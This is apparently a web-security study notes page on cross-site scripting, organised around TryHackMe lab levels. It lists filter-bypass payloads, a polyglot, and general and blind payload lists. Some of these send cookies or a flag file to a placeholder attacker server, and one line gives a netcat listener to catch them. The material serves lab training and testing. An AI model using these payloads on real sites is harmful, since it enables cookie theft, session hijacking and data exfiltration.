Cross-site scripting (XSS)

XSS (cross-site scripting).

4 types of XSS attack methods:

Reflected XSS
Stored XSS
DOM XSS
Blind XSS

GitHub - mandatoryprogrammer/xsshunter-express: An easy-to-setup version of XSS Hunter. Sets up in five minutes and requires no maintenance!GitHub

Methods to load XSS payload

URL file path, or query parameters
Insecure Javascript functions
- eval()
Non-validated user input forms
window.location.x
- Eg. window.location.hash

Perfecting payload

Practice room: https://tryhackme.com/r/room/xss, Task 7 (Perfecting your payload)

Some of the examples listed below are taken from the TryHackMe (THM) practice lab link above.

1. Input within <h2> tag with no filter (THM level 1)

a) Simply <script>alert('XSS');</script>

2. Input used as value attribute of <input> tag (THM level 2)

Eg. XSS payload input: <script>alert('XSS');</script>-> <input value="<script>alert('XSS');"</script>">

a) "> <script>alert('XSS');</script>

": The first quotation mark is used to escape from the value attribute of the <input> tag
>: The > character is used to close the <input> tag

3. Input used as value within <textarea> tag (THM level 3)

Eg. XSS payload input: <script>alert('XSS');</script>-> <textarea><script>alert('XSS');</script></textarea>

a) </textarea> <script>alert('XSS');</script>

</textarea>: The <textarea> closing tag to close the textarea

4. Input used as value to innerHTML in a script (within a <script> tag) (THM level 4)

Eg. XSS payload input: <script>alert('XSS');</script> -> <script> document.getElementsByClassName(...)[0].innerHTML='<script>alert('XSS'); ...

a) '; alert('XSS'); //

': To escape from the field
;: To signify end of command on the current line in JavaScript
//: Makes the code after the alert statement to be comments (to not be executed)

b) ' </script> <script> alert('THM');</script>

': To escape from the field
</script>: To close the original <script> tag, to allow for opening of a new <script> tag

5. Filter that removes the word script (THM level 5)

Eg. <script>alert('XSS');</script> -> <>alert('XSS');</>

a) <scripscriptt>alert('XSS');</scripscriptt>

-> <scripscriptt>alert('XSS');</scripscriptt>

-> <script>alert('XSS');</script>

6. Input used as value for the src attribute of the img tag, with HTML opening/closing tags removed (`<` and `>`) (level 6)

Eg.
Valid input: /images/test.jpg -> <img src="/images/test.jpg" >
XSS payload input: "> <script>alert('XSS');</script> -> <img src="" scriptalert('xss');="" script"=""> (< and > removed)

How to bypass:

a) /images/cat.jpg " onload="javascript:alert('THM');"

Instead of escaping out of the <img> tag to create a new <script> tag, an inline attribute can be used to call a script instead
/images/cat.jpg: Can be any other valid path to an image that exists. This is to trigger the onload attribute function to be called after the image has loaded.
": The quotation marks right after the invalid image file path is used to escape the src attribute, and create the onload attribute

b) / " onerror="alert('XSS');"

Similar to part a)
/: Can be any other invalid path to an image that does not exists. This is to trigger the onerror attribute function to be called.
": The quotation marks right after the invalid image file path is used to escape the src attribute, and create the onerror attribute

8. IMG tag

a) <img src="/invalid-path" onerror="alert('XSS');">

b) <img src="/valid-path" onload="alert('THM');">

c) Extract the cookies? 🍪 : <img src="/invalid-path" onerror="(function(){console.log(document.cookie);fetch('https://<server_address>:8888?cookie='+btoa(document.cookie));})()">

Netcat command to listen at the <server_address>:

$ nc -nvlp 8888

-> Log the cookie and send an API call with the cookie as the request body

Disallow <script></script> tag

a) Use anchor tag: <a onmouseover="javascript:alert('XSS');">...</a>

b) Use iframe tag: <iframe src="javascript:alert('XSS');">

... refer to OWASP cheat sheet below for more examples

Polygots

An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e

Taken from: https://tryhackme.com/r/room/xss

General XSS payloads

Generally, the following payloads containing different HTML tags can be used to test for the presence of a XSS vulnerability. Some tag may work, while some may not.

For some browsers, the payload may be interpreted diferrently. Try the following methods to troubleshoot the issue:

a) Closing slash

Eg. <img> vs <img/>

b) Apostrophe vs backtick

Eg. alert(`xss`) vs alert('xss')

General payloads

<script></script>

<script>alert(`yay`)</script>

<img/>

<img src=x onerror="alert(`xss`)">
<img src="javascript:alert(`xss`)">

<svg/>

<svg onload="alert(`xss`)">

<iframe/>

<iframe src="javascript:alert(`xss`)">
<iframe srcdoc="<script>alert(`xss`)</script>">

<a>

<a href="javascript:alert(1)">

<span>, <br>

<span onmouseover="alert(`xss`)"></span>
<br onmouseover=alert('xss')/>

<video>

<video onplay="alert(`xss`)"><source src=x></video>

<object/>

...

Blind XSS payloads

'"> <script>fetch('http://<IP>:[port]?xss=yay')</script>
'"> <script src="http://<IP>:[port]?xss=yay"></script>
<img/>,<object/>
<iframe src="javascript:alert(`xss`)"/>

blind-xss-payloads/README.md at main · lauritzh/blind-xss-payloadsGitHub

Bypass restrictions/filters, etc.

Obfuscation

-> unicode, url-encode, etc.

-> base64

Capitalization

Eg. <img src="x" onerror="alert('xss')"/>

-> <img sRc="x" onerror="alert('xss')"/> (capitalize 'r' in src)

-> <img src="x" onerRoR="alert('xss')"/> (capitalize 2 last 'r' in onerror)

Vulnerability assessment automation

TODO: Write a script that fuzzes different XSS payloads to the task 7 challenge of OWASP juice shop TryHackMe challenge (link below)

Practice

Task 7 of OWASP juice shop room in TryHackMe:

a) Challenge: https://tryhackme.com/room/owaspjuiceshop

b) Write-up: https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking/write-ups/owasp-juice-shop

The Sticker ShopTryHackMe

Blind XSS payload:

"><script>(function(){ fetch("http://127.0.0.1:8080/flag.txt").then(res=>res.text()).then(data=>fetch("http://<attack_box_ip>:<port>?v="+btoa(data))); })()</script>

https://github.com/payloadbox/xss-payload-listgithub.com

PreviousCORS vs CSRF NextHTTP Request Smuggling

Last updated 10 months ago

hashtagMethods to load XSS payload

hashtagPerfecting payload

hashtag1. Input within <h2> tag with no filter (THM level 1)

hashtag2. Input used as value attribute of <input> tag (THM level 2)

hashtag3. Input used as value within <textarea> tag (THM level 3)

hashtag4. Input used as value to innerHTML in a script (within a <script> tag) (THM level 4)

hashtag5. Filter that removes the word script (THM level 5)

hashtag6. Input used as value for the src attribute of the img tag, with HTML opening/closing tags removed (< and >) (level 6)

hashtag8. IMG tag

hashtagPolygots

hashtagGeneral XSS payloads

hashtagBlind XSS payloads

hashtagBypass restrictions/filters, etc.

hashtagVulnerability assessment automation

hashtagPractice